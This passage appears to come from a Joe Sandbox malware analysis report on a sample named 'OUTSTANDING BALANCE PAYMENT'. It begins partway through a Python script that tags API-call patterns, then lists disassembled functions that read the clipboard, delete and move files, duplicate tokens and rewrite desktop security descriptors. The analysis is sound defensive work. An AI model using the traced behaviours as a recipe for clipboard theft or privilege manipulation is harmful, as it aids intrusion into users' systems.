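# prefixed with "Part of subcall function XXXX:" for calls made by callees.
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
VK_MENU = 0x12  # Alt; keybd_event's first argument is the virtual-key code


def parse_arg(tok: str):
    """'?' -> None (unresolved), 8 hex digits -> int, anything else -> literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):  # ASSUMPTION: Joe prints numbers as 8 hex digits
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> Optional[Dict]:
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw is not None else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None}


def parse_block(text: str) -> List[Dict]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def find_patterns(calls: List[Dict]) -> Dict[str, str]:
    apis = {c["api"] for c in calls}
    findings: Dict[str, str] = {}
    # Foreground-lock workaround: attach to the foreground thread's input queue
    # and press Alt so that SetForegroundWindow is allowed to succeed.
    alt_presses = [c for c in calls if c["api"] == "keybd_event" and c["args"][:1] == [VK_MENU]]
    if {"AttachThreadInput", "SetForegroundWindow"} <= apis and alt_presses:
        anchored = any(c["api"] == "FindWindowW" and "Shell_TrayWnd" in c["args"] for c in calls)
        findings["foreground_lock_bypass"] = (
            f"{len(alt_presses)} keybd_event(VK_MENU) calls"
            + (" after FindWindowW(Shell_TrayWnd)" if anchored else ""))
    # Duplicated token plus explicit window-station/desktop opens: RunAs-style setup.
    if {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"} <= apis:
        station = next((c["args"][0] for c in calls if c["api"] == "OpenWindowStationW"), None)
        desktop = next((c["args"][0] for c in calls if c["api"] == "OpenDesktopW"), None)
        findings["token_and_desktop_access"] = f"window station {station!r}, desktop {desktop!r}"
    # Fixed delays: decode the millisecond argument and note where the call sits.
    for c in calls:
        if c["api"] == "Sleep" and c["args"] and isinstance(c["args"][0], int):
            findings["sleep_ms"] = f"{c['args'][0]} ms at {c['ref']:08X}"
    return findings


# Constructed input: subsets of three records copied from this report.
SAMPLE_WINACTIVATE = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F3AEA
• SetForegroundWindow.USER32(000000FF), ref: 002F3B0A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002F3B20
• GetCurrentThreadId.KERNEL32 ref: 002F3B27
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002F3B44
• MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B6C
• keybd_event.USER32(00000012,00000000), ref: 002F3B77
• keybd_event.USER32(00000012,00000000), ref: 002F3B86
• SetForegroundWindow.USER32(000000FF), ref: 002F3BA6
• AttachThreadInput.USER32(000000FF,?,00000000), ref: 002F3BCD
"""
SAMPLE_RUNAS = """\
  • Part of subcall function 002BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
  • Part of subcall function 002BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002BAD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002BAD82
• SetProcessWindowStation.USER32(00000000), ref: 002BADA5
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002BADBF
"""
SAMPLE_SLEEP = "• Sleep.KERNELBASE(000001F4), ref: 01227AB9\n"

if __name__ == "__main__":
    for name, text in (("WinActivate", SAMPLE_WINACTIVATE), ("RunAs", SAMPLE_RUNAS), ("Sleep", SAMPLE_SLEEP)):
        print(name, find_patterns(parse_block(text)))
```

Feeding every "APIs" record of the report through parse_block and find_patterns gives a per-function tag list; records that match only runtime patterns like these can be deprioritised, while the 500 ms Sleep in the non-PE-backed 01225000 region is the one worth chasing.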
                                                                  APIs
                                                                    • Part of subcall function 002BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
                                                                    • Part of subcall function 002BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
                                                                    • Part of subcall function 002BB134: GetLastError.KERNEL32 ref: 002BB1BA
                                                                  • _memset.LIBCMT ref: 002BAD08
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002BAD5A
                                                                  • CloseHandle.KERNEL32(?), ref: 002BAD6B
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002BAD82
                                                                  • GetProcessWindowStation.USER32 ref: 002BAD9B
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 002BADA5
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002BADBF
                                                                    • Part of subcall function 002BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002BACC0), ref: 002BAB99
                                                                    • Part of subcall function 002BAB84: CloseHandle.KERNEL32(?,?,002BACC0), ref: 002BABAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $H*3$default$winsta0
                                                                  • API String ID: 2063423040-967494751
                                                                  • Opcode ID: b41ba5fb2bd3b459f2d221037927131e3c4ca7a06419669c4771e4323d213a43
                                                                  • Instruction ID: a6b000a0f31009ae534003f377cc462bea22736ee780bb0ab706c29ae11c2306
                                                                  • Opcode Fuzzy Hash: b41ba5fb2bd3b459f2d221037927131e3c4ca7a06419669c4771e4323d213a43
                                                                  • Instruction Fuzzy Hash: 0381A07181120AAFEF12DFA4DC45AEEBBBCFF04344F04412AF914A2161DB728E64DB61
                                                                  APIs
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C5FA6,?), ref: 002C6ED8
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002C5FA6,?), ref: 002C6EF1
                                                                    • Part of subcall function 002C725E: __wsplitpath.LIBCMT ref: 002C727B
                                                                    • Part of subcall function 002C725E: __wsplitpath.LIBCMT ref: 002C728E
                                                                    • Part of subcall function 002C72CB: GetFileAttributesW.KERNEL32(?,002C6019), ref: 002C72CC
                                                                  • _wcscat.LIBCMT ref: 002C6149
                                                                  • _wcscat.LIBCMT ref: 002C6167
                                                                  • __wsplitpath.LIBCMT ref: 002C618E
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002C61A4
                                                                  • _wcscpy.LIBCMT ref: 002C6209
                                                                  • _wcscat.LIBCMT ref: 002C621C
                                                                  • _wcscat.LIBCMT ref: 002C622F
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 002C625D
                                                                  • DeleteFileW.KERNEL32(?), ref: 002C626E
                                                                  • MoveFileW.KERNEL32(?,?), ref: 002C6289
                                                                  • MoveFileW.KERNEL32(?,?), ref: 002C6298
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 002C62AD
                                                                  • DeleteFileW.KERNEL32(?), ref: 002C62BE
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002C62E1
                                                                  • FindClose.KERNEL32(00000000), ref: 002C62FD
                                                                  • FindClose.KERNEL32(00000000), ref: 002C630B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                  • String ID: \*.*$p1#v`K$v
                                                                  • API String ID: 1917200108-1732502266
                                                                  • Opcode ID: 55a3bceb0d267c8d5d7d041e46973d3d5e70536a49c7ea29bdba7172d99d85f5
                                                                  • Instruction ID: b61aa65983c169b3602187520c698a707284a94e5a6c056aa3c83687ac112ebd
                                                                  • Opcode Fuzzy Hash: 55a3bceb0d267c8d5d7d041e46973d3d5e70536a49c7ea29bdba7172d99d85f5
                                                                  • Instruction Fuzzy Hash: 67512F7281911D6ACB21EB91CC48EEB77FCAF05300F0901EAE585E3141DE769799CFA5
                                                                  APIs
                                                                  • OpenClipboard.USER32(0031DC00), ref: 002D6B36
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 002D6B44
                                                                  • GetClipboardData.USER32(0000000D), ref: 002D6B4C
                                                                  • CloseClipboard.USER32 ref: 002D6B58
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002D6B74
                                                                  • CloseClipboard.USER32 ref: 002D6B7E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002D6B93
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 002D6BA0
                                                                  • GetClipboardData.USER32(00000001), ref: 002D6BA8
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002D6BB5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002D6BE9
                                                                  • CloseClipboard.USER32 ref: 002D6CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                  • String ID:
                                                                  • API String ID: 3222323430-0
                                                                  • Opcode ID: c691b2d9e1d5f1efab50f5d582c859432b4004a8b2ba655f24d95ba5c5da0f6b
                                                                  • Instruction ID: b73c3eb5c7675ec11670beffab299d191e0baed3d574b841ef3f536bb15949f4
                                                                  • Opcode Fuzzy Hash: c691b2d9e1d5f1efab50f5d582c859432b4004a8b2ba655f24d95ba5c5da0f6b
                                                                  • Instruction Fuzzy Hash: 78519C35221206ABD301AFA0CCAAF6E77ECAF84B14F00042BF546E62D1DF70DC158B62
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002CF62B
                                                                  • FindClose.KERNEL32(00000000), ref: 002CF67F
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002CF6A4
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002CF6BB
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 002CF6E2
                                                                  • __swprintf.LIBCMT ref: 002CF72E
                                                                  • __swprintf.LIBCMT ref: 002CF767
                                                                  • __swprintf.LIBCMT ref: 002CF7BB
                                                                    • Part of subcall function 002A172B: __woutput_l.LIBCMT ref: 002A1784
                                                                  • __swprintf.LIBCMT ref: 002CF809
                                                                  • __swprintf.LIBCMT ref: 002CF858
                                                                  • __swprintf.LIBCMT ref: 002CF8A7
                                                                  • __swprintf.LIBCMT ref: 002CF8F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 835046349-2428617273
                                                                  • Opcode ID: 5d34a015910dfbd88263d6f22b4555c9b9a3ddf15c2f0886e435a112688a3bdc
                                                                  • Instruction ID: cd41ef4d264ef05862306eff7e2828299efc1a361ff66e78e0248b0556116c3b
                                                                  • Opcode Fuzzy Hash: 5d34a015910dfbd88263d6f22b4555c9b9a3ddf15c2f0886e435a112688a3bdc
                                                                  • Instruction Fuzzy Hash: 78A14FB2419340ABC705EBA4CD81DAFB7ECAF98704F440D2EF59582192EB34D958CB62
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002D1B50
                                                                  • _wcscmp.LIBCMT ref: 002D1B65
                                                                  • _wcscmp.LIBCMT ref: 002D1B7C
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002D1B8E
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 002D1BA8
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002D1BC0
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1BCB
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002D1BE7
                                                                  • _wcscmp.LIBCMT ref: 002D1C0E
                                                                  • _wcscmp.LIBCMT ref: 002D1C25
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D1C37
                                                                  • SetCurrentDirectoryW.KERNEL32(003339FC), ref: 002D1C55
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002D1C5F
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1C6C
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1C7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 20714997796ca770e6da2f9fa207db2b7c3a4cb8aa64b36b8e7cf1bdd2bd1c90
                                                                  • Instruction ID: 880087ac2e15c47d28d67d15e3e26a214c9c74dd99893b261ebaa42ff87b25be
                                                                  • Opcode Fuzzy Hash: 20714997796ca770e6da2f9fa207db2b7c3a4cb8aa64b36b8e7cf1bdd2bd1c90
                                                                  • Instruction Fuzzy Hash: D931D332A5121ABBDF15AFF0DC49BDE77AC9F05324F104197E801E2191EB70DEA58E64
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002D1CAB
                                                                  • _wcscmp.LIBCMT ref: 002D1CC0
                                                                  • _wcscmp.LIBCMT ref: 002D1CD7
                                                                    • Part of subcall function 002C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002C6BEF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002D1D06
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1D11
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002D1D2D
                                                                  • _wcscmp.LIBCMT ref: 002D1D54
                                                                  • _wcscmp.LIBCMT ref: 002D1D6B
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D1D7D
                                                                  • SetCurrentDirectoryW.KERNEL32(003339FC), ref: 002D1D9B
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002D1DA5
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1DB2
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1DC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: 426d8cb149d9bef493231735361a338ea29042f98d5a1de43f364d8436d128f3
                                                                  • Instruction ID: cb9553ab885bfd549931a84767a663341aba75df1b0b2aac7d81fc9504809566
                                                                  • Opcode Fuzzy Hash: 426d8cb149d9bef493231735361a338ea29042f98d5a1de43f364d8436d128f3
                                                                  • Instruction Fuzzy Hash: 2B31123291121ABBCF15AFA0EC48BDE37AE9F05320F140553E800A22D1DB70CEB58E64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                  • API String ID: 2102423945-2023335898
                                                                  • Opcode ID: cea6eb17a0f291146161f92c892543b0d6514011223d9df8cb86fc8ae6ea6162
                                                                  • Instruction ID: 7df0431ca05b4588835f319f0bfde52748be177ecb4b688fd822af7690b5476e
                                                                  • Opcode Fuzzy Hash: cea6eb17a0f291146161f92c892543b0d6514011223d9df8cb86fc8ae6ea6162
                                                                  • Instruction Fuzzy Hash: F782E075D2521ACBCB24DF94C9807BDFBB1BF48350F2581A9D819AB391E7749DA0CB80
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 002D09DF
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D09EF
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002D09FB
                                                                  • __wsplitpath.LIBCMT ref: 002D0A59
                                                                  • _wcscat.LIBCMT ref: 002D0A71
                                                                  • _wcscat.LIBCMT ref: 002D0A83
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D0A98
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0AAC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0ADE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0AFF
                                                                  • _wcscpy.LIBCMT ref: 002D0B0B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002D0B4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                  • String ID: *.*
                                                                  • API String ID: 3566783562-438819550
                                                                  • Opcode ID: 37360d12b7462f3201aec70691c25859fc261c6a53d461361f8691e184f3dcae
                                                                  • Instruction ID: e6c119336acb8d5309634228a098178a49c6382dae9d481e98d30122d0b89780
                                                                  • Opcode Fuzzy Hash: 37360d12b7462f3201aec70691c25859fc261c6a53d461361f8691e184f3dcae
                                                                  • Instruction Fuzzy Hash: 0C6159765283059FD710EF60C894AAEB3E8FF89314F04491AF98987252DB31ED55CF92
                                                                  APIs
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002BABD7
                                                                    • Part of subcall function 002BABBB: GetLastError.KERNEL32(?,002BA69F,?,?,?), ref: 002BABE1
                                                                    • Part of subcall function 002BABBB: GetProcessHeap.KERNEL32(00000008,?,?,002BA69F,?,?,?), ref: 002BABF0
                                                                    • Part of subcall function 002BABBB: HeapAlloc.KERNEL32(00000000,?,002BA69F,?,?,?), ref: 002BABF7
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002BAC0E
                                                                    • Part of subcall function 002BAC56: GetProcessHeap.KERNEL32(00000008,002BA6B5,00000000,00000000,?,002BA6B5,?), ref: 002BAC62
                                                                    • Part of subcall function 002BAC56: HeapAlloc.KERNEL32(00000000,?,002BA6B5,?), ref: 002BAC69
                                                                    • Part of subcall function 002BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002BA6B5,?), ref: 002BAC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002BA6D0
                                                                  • _memset.LIBCMT ref: 002BA6E5
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002BA704
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA715
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 002BA752
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002BA76E
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA78B
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002BA79A
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002BA7A1
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002BA7C2
                                                                  • CopySid.ADVAPI32(00000000), ref: 002BA7C9
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002BA7FA
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002BA820
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002BA834
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: 45802a993706a387d9b6934e6d13ff027d884a4248af0b1b103a8fa85aaed988
                                                                  • Instruction ID: c392944802b723c85b44c1ecc097b1825a6eaa8bcebe35ad170fa1ffa539ec3e
                                                                  • Opcode Fuzzy Hash: 45802a993706a387d9b6934e6d13ff027d884a4248af0b1b103a8fa85aaed988
                                                                  • Instruction Fuzzy Hash: 29515A7191020ABFDF05DFA5DC44AEEBBB9FF04340F04812AF915A7290DB349A16CB61
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$222 2
                                                                  • API String ID: 0-30713062
                                                                  • Opcode ID: cd419403e592e780f701b1d7d3814a8e3666cd03d222e0ab0696d98e06a19852
                                                                  • Instruction ID: 8822ef43e9f5365d3220ca9be3658b8b53e33481aff05edfc2c2014ef017116a
                                                                  • Opcode Fuzzy Hash: cd419403e592e780f701b1d7d3814a8e3666cd03d222e0ab0696d98e06a19852
                                                                  • Instruction Fuzzy Hash: 5472A075E1621ADBDB15DF58C8907AEB7B5BF08310F24816AE805EB6C0DB709E91CF90
                                                                  APIs
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C5FA6,?), ref: 002C6ED8
                                                                    • Part of subcall function 002C72CB: GetFileAttributesW.KERNEL32(?,002C6019), ref: 002C72CC
                                                                  • _wcscat.LIBCMT ref: 002C6441
                                                                  • __wsplitpath.LIBCMT ref: 002C645F
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002C6474
                                                                  • _wcscpy.LIBCMT ref: 002C64A3
                                                                  • _wcscat.LIBCMT ref: 002C64B8
                                                                  • _wcscat.LIBCMT ref: 002C64CA
                                                                  • DeleteFileW.KERNEL32(?), ref: 002C64DA
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002C64EB
                                                                  • FindClose.KERNEL32(00000000), ref: 002C6506
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                  • String ID: \*.*$p1#v`K$v
                                                                  • API String ID: 2643075503-1732502266
                                                                  • Opcode ID: f7a365d32e40b45eb82059529122a1d78e20bef80bd7b44e9c20ec0261b3efff
                                                                  • Instruction ID: 6945f590b13696d6d6e22480dfbf3efa99a6af620cfd3656ff053798f4483d18
